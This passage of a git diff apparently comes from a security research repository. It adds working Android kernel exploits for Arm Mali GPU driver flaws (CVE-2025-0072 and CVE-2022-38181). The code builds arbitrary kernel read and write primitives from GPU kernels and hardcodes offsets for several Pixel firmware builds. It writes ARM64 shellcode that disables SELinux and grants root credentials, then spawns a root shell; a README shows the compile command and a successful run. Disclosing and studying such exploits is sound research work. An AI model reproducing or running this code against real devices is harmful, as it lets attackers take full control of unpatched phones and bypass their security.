failed\n"); + } + + uint64_t y0 = *(queue_userio2 + 0x1000/8); + + + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + munmap(queue_userio, 0x3000); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int idx = find_pgd(queue_userio2); + if (idx == -1) { + err(1, "Cannot find page table entry\n"); + } + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + uint64_t write_addr = 0x1000 + (uint64_t)queue_userio2 + 0x1000; + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + LOG("run enforce\n"); + run_enforce(); + LOG("clean up\n"); + uint64_t* cleanup_addr = (uint64_t*)(write_addr + OVERWRITE_INDEX * sizeof(uint64_t)); + uint64_t invalid = 2; + *cleanup_addr = invalid; + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c new file mode 100644 index 0000000..34b430a --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c @@ -0,0 +1,264 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" + +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 
0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) { + int ret = 0; + + const char* source_str64 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned long *addr = (__global unsigned long*)(va[idx]);" + " addr[0] = in_out[idx];" + "} else {" + " __global unsigned long *addr = (__global unsigned long *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str32 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned int *addr = (__global unsigned int*)(va[idx]);" + " addr[0] = (unsigned int)(in_out[idx]);" + "} else {" + " __global unsigned int *addr = (__global unsigned int *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str = is64 ? source_str64 : source_str32; + + size_t source_size = strlen(source_str); + + cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create va buffer\n"); + } + cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create in_out buffer\n"); + } + cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create flag buffer\n"); + } + + cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret); + ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to create program\n"); + } + + cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create kernel %d\n", ret); + } + ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va); + ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out); + ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag); + if (ret != CL_SUCCESS) { + err(1, "Failed to set kernel arg\n"); + } + struct rw_mem_kernel out = {0}; + out.va = va; + out.in_out = in_out; + out.flag = flag; + out.kernel = kernel; + out.program = program; + return out; +} + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t write = 1; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = 
clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Failed to flush queue in write_to\n"); + } + usleep(10000); +} + + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr && overwrite_addr >= base && overwrite_addr < end) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + uint64_t this_addr = overwrite_addr + func_offset + code * 4; + uint64_t this_code = shellcode[code]; + write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32); + } + usleep(300000); + } + } + } +} + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t read = 0; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + uint64_t out = 0; + if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) { + err(1, "Failed to read result\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Failed to flush queue in read_from\n"); + } + usleep(10000); + return out; +} + +void releaseKernel(struct rw_mem_kernel* kernel) { + clReleaseKernel(kernel->kernel); + clReleaseProgram(kernel->program); + clReleaseMemObject(kernel->va); + clReleaseMemObject(kernel->in_out); + clReleaseMemObject(kernel->flag); + memset(kernel, 0, sizeof(struct rw_mem_kernel)); +} + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + uint64_t invalid = 2; + write_to(mali_fd, &addr, &invalid, command_queue, kernel); +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h new file mode 100644 index 0000000..1906051 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h @@ -0,0 +1,41 @@ +#ifndef MEM_READ_WRITE_H +#define MEM_READ_WRITE_H + 
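A usage sketch for the read/write helpers this header declares (illustrative only; the OpenCL context, device, queue and the mali fd are created by the caller, as in `mali_userio.c` earlier in this diff, and `flip_bit` is a hypothetical name):

```c
#include <stdint.h>
#include <stdbool.h>
#include "CL/cl.h"
#include "mem_read_write.h"

/* Flip the low bit of a 64-bit word at a GPU virtual address using the
 * GPU-kernel-backed read/write primitives. */
static void flip_bit(int mali_fd, cl_context ctx, cl_device_id dev,
                     cl_command_queue queue, uint64_t gpu_va)
{
    struct rw_mem_kernel k64 = create_rw_mem(ctx, &dev, true /* 64-bit */);
    uint64_t val = read_from(mali_fd, &gpu_va, queue, &k64);
    val ^= 1;
    write_to(mali_fd, &gpu_va, &val, queue, &k64);
    releaseKernel(&k64);
}
```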
+#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +struct rw_mem_kernel { + cl_mem va; + cl_mem in_out; + cl_mem flag; + cl_kernel kernel; + cl_program program; +}; + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32); + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64); + +void releaseKernel(struct rw_mem_kernel* kernel); + +int run_enforce(); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c new file mode 100644 index 0000000..c96b25c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h new file mode 100644 index 0000000..9aa4caa --- /dev/null +++ 
@@ -0,0 +1,20 @@
+#ifndef MEMPOOL_UTILS_H
+#define MEMPOOL_UTILS_H
+
+#include <stdint.h>
+#include "mali_kbase_ioctl.h"
+#include "mali_base_csf_kernel.h"
+#include "mali_base_kernel.h"
+#include "log_utils.h"
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+uint64_t drain_mem_pool(int mali_fd);
+
+void release_mem_pool(int mali_fd, uint64_t drain);
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
new file mode 100644
index 0000000..b89efc7
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
@@ -0,0 +1,41 @@
+## Exploit for CVE-2022-38181
+
+The write-up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit was tested on the Google Pixel 6. The original exploit that was sent to Google is included as `hello-jni.c` as a reference and was tested on the July 2022 patch of the Pixel 6. Because the Pixel 6 cannot be downgraded from Android 13 to Android 12, an updated version of the exploit, `mali_shrinker_mmap.c`, is included; it supports various Android 13 firmware versions, including the December patch, which is the latest affected version. For reference, I used the following command to compile with clang in ndk-r21d:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_shrinker_mmap.c -o mali_shrinker_mmap
+```
+
+The exploit should be run a couple of minutes after boot and should be fairly reliable. If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_shrinker_mmap
+fingerprint: google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys
+failed, retry.
+failed, retry.
+region freed 51
+read 0
+cleanup flush region
+jit_freed
+jit_free commit: 0 0
+Found freed_idx 0
+Found pgd 20, 769c414000
+overwrite addr : 7701100710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7701100710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7700d00710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7700d00710 710
+overwrite addr : 7701100fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7701100fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7700d00fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7700d00fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c
new file mode 100644
index 0000000..b9ef3ce
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c
@@ -0,0 +1,759 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include "stdbool.h"
+#include <sys/syscall.h>
+#include <sys/system_properties.h>
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include <android/log.h>
+#define LOG(fmt, ...) 
__android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define SPRAY_PAGES 25 + +#define SPRAY_NUM 64 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define SPRAY_CPU 0 + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define NUM_TRIALS 100 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2108 0x92df1c + +#define SEL_READ_ENFORCE_2108 0x942ae4 + +#define INIT_CRED_2108 0x29a0570 + +#define COMMIT_CREDS_2108 0x180b0c + +#define ADD_INIT_2108 0x9115c000 + +#define ADD_COMMIT_2108 0x912c3108 + +#define AVC_DENY_2201 0x930af4 + +#define SEL_READ_ENFORCE_2201 0x9456bc + +#define INIT_CRED_2201 0x29b0570 + +#define COMMIT_CREDS_2201 0x183df0 + +#define ADD_INIT_2201 0x9115c000 + +#define ADD_COMMIT_2201 0x9137c108 + +#define AVC_DENY_2202 0x930b50 + +#define SEL_READ_ENFORCE_2202 0x94551c + +#define INIT_CRED_2202 0x29b0570 + +#define COMMIT_CREDS_2202 0x183e3c + +#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570 + +#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c + +#define AVC_DENY_2207 0x927664 + +#define SEL_READ_ENFORCE_2207 0x93bf5c + +#define INIT_CRED_2207 0x29e07f0 + +#define COMMIT_CREDS_2207 0x18629c + +#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0 + +#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207; + +static uint64_t avc_deny = AVC_DENY_2207; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t jit_id = 1; +static uint8_t atom_number = 1; +static uint64_t gpu_va[SPRAY_NUM] = {0}; +static int gpu_va_idx = 0; +static void* flush_regions[FLUSH_REGION_SIZE]; +static void* alias_regions[SPRAY_NUM] = {0}; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, 
uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
+  struct base_jit_alloc_info info = {0};
+  struct base_jd_atom_v2 atom = {0};
+
+  info.id = id;
+  info.gpu_alloc_addr = gpu_alloc_addr;
+  info.va_pages = va_pages;
+  info.commit_pages = va_pages;
+  info.extension = 0x1000;
+
+  atom.jc = (uint64_t)(&info);
+  atom.atom_number = atom_number;
+  atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+  atom.nr_extres = 1;
+  struct kbase_ioctl_job_submit submit = {0};
+  submit.addr = (uint64_t)(&atom);
+  submit.nr_atoms = 1;
+  submit.stride = sizeof(struct base_jd_atom_v2);
+  if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+    err(1, "submit job failed\n");
+  }
+  return *((uint64_t*)gpu_alloc_addr);
+}
+
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+  uint8_t free_id = id;
+
+  struct base_jd_atom_v2 atom = {0};
+
+  atom.jc = (uint64_t)(&free_id);
+  atom.atom_number = atom_number;
+  atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+  atom.nr_extres = 1;
+  struct kbase_ioctl_job_submit submit = {0};
+  submit.addr = (uint64_t)(&atom);
+  submit.nr_atoms = 1;
+  submit.stride = sizeof(struct base_jd_atom_v2);
+  if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+    err(1, "submit job failed\n");
+  }
+
+}
+
+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+  struct kbase_ioctl_mem_flags_change change = {0};
+  change.flags = flags;
+  change.gpu_va = gpu_addr;
+  change.mask = flags;
+  if (ignore_results) {
+    ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+    return;
+  }
+  if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+    err(1, "flags_change failed\n");
+  }
+}
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+    err(1, "mem_alloc failed\n");
+  }
+}
+
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+    err(1, "mem_alias failed\n");
+  }
+}
+
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+    err(1, "mem_query failed\n");
+  }
+}
+
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+  struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages};
+  if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+    err(1, "mem_commit failed\n");
+  }
+}
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+  int prot = PROT_READ;
+  if (!read_only) {
+    alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+    prot |= PROT_WRITE;
+  }
+  alloc.in.va_pages = va_pages;
+  alloc.in.commit_pages = commit_pages;
+  mem_alloc(mali_fd, &alloc);
+  void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+  if (region == MAP_FAILED) {
+    err(1, "mmap failed");
+  }
+  return region;
+}
+
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+  int prot = PROT_READ | PROT_WRITE;
+  alloc.in.va_pages = pages;
+  alloc.in.commit_pages = pages;
+  mem_alloc(mali_fd, &alloc);
+  return alloc.out.gpu_va;
+}
+
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+  struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+  if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+    err(1, "free_mem failed\n");
+ 
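+  /*
+   * The two helpers below, drain_mem_pool() and release_mem_pool(), empty
+   * and then overfill the kbase context memory pool: draining allocates
+   * POOL_SIZE pages so the pool is exhausted, and releasing frees them all
+   * at once so the pool is left full. Pages freed after that, such as the
+   * evicted JIT region, no longer fit in the pool and go back to the
+   * kernel page allocator, where the exploit can reclaim them.
+   */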
} +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +void* flush(int spray_cpu, int idx) { + migrate_to_cpu(spray_cpu); + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; 